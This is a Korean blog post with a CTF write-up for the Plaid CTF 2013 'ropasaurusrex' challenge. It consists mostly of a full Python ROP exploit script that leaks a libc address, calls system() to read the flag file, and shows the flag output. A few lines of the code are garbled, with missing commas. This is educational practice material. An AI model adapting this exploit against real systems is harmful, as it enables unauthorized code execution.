티스토리 뷰

Pwnable/CTF

Plaid CTF 2013 [ropasaurusrex]

err0rless313 2014. 12. 13. 19:30

Plaid CTF 2013   ropasaurusrex


Binary->

http://shell-storm.org/repo/CTF/PlaidCTF-2013/Pwnable/ropasaurusrex-200/



Server     Ubuntu 14.04 LTS

Clien       Kali Linux


ASLR, NX-Bit


root@Kali ~/s/e/ropasaurusrex# checksec --file binaryRopasaurusrex 

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH

No RELRO     No canary found   NX enabled  No PIE    No RPATH   No RUNPATH 



풀이과정은 


http://err0rless313.tistory.com/entry/CodeGate-Junior-2014-NUCLEAR


와 매우 비슷한 ROP이기 때문에 생략


취약점도 찾기 굉장히 쉬움(쉬운게 아니라 대놓고..)



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python
#-*-coding:utf8-*-
from socket import *
from struct import pack, unpack
from time import sleep
 
p   = lambda x : pack("<L", x)
up  = lambda x : unpack("<L", x)[0]
s   = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.1.143"1025))
 
############################################
overflow     = "\x90" * 140
 
write_plt    = p(0x0804830c)
write_got    = p(0x08049614)
read_plt     = p(0x0804832c)
read_got     = p(0x0804961c)
pop3ret      = p(0x080484B6)
vuln_func    = p(0x080483F4)
dataSec      = p(0x08049630)
offset       = [0x09B3C00x0A8370]
#                system         exit
 
##### payload #####
payload  = ""
payload += overflow
payload += write_plt
payload += pop3ret
payload += p(0x01)
payload += write_got
payload += p(0xFF)
 
payload += vuln_func
payload += "\x90" * 4
payload += p(0x04)
 
s.send(payload + "\n")
write_libc   = up(s.recv(1024)[:4])
system_libc  = write_libc - offset[0]
exit_libc    = write_libc - offset[1]
 
print "[*] write@libc   : " + hex(write_libc)
print "[*]system@libc  : " + hex(system_libc)
print "[*] exit@libc    : " + hex(exit_libc)
 
payload  = ""
payload += overflow
payload += read_plt
payload += pop3ret
payload += p(0x00)
payload += dataSec
payload += p(0xff)
 
payload += p(system_libc)
payload += p(exit_libc)
payload += dataSec
 
s.send(payload + "\n")
s.send("cat /root/sys_hack/pCTF/key\n")
flag = s.recv(32)[:31]
print "[*] FLAG IS [ " + flag + " ]"
cs



root@Kali ~/s/e/ropasaurusrex# ./ropasaurusrexExploit.py

[*] write@libc :   0xb76a1770L

[*] exit@libc :     0xb75f9400L

[*] system@libc : 0xb76063b0L

[*] FLAG IS [ you_cant_stop_the_ropasaurusrex ]


저작자표시 비영리 변경금지

'Pwnable > CTF' 카테고리의 다른 글

Volga CTF 2014 [exploit 100]  (0) 2015.01.28
CSAW 2012 [Challenge1]  (0) 2015.01.23
CodeGate 2014 [ Angry Doreamon ]  (2) 2015.01.14
NullCon 2014 [Exploitation 100]  (0) 2015.01.13
CodeGate Junior 2014 [nuclear]  (0) 2014.12.12
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG
more
«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
글 보관함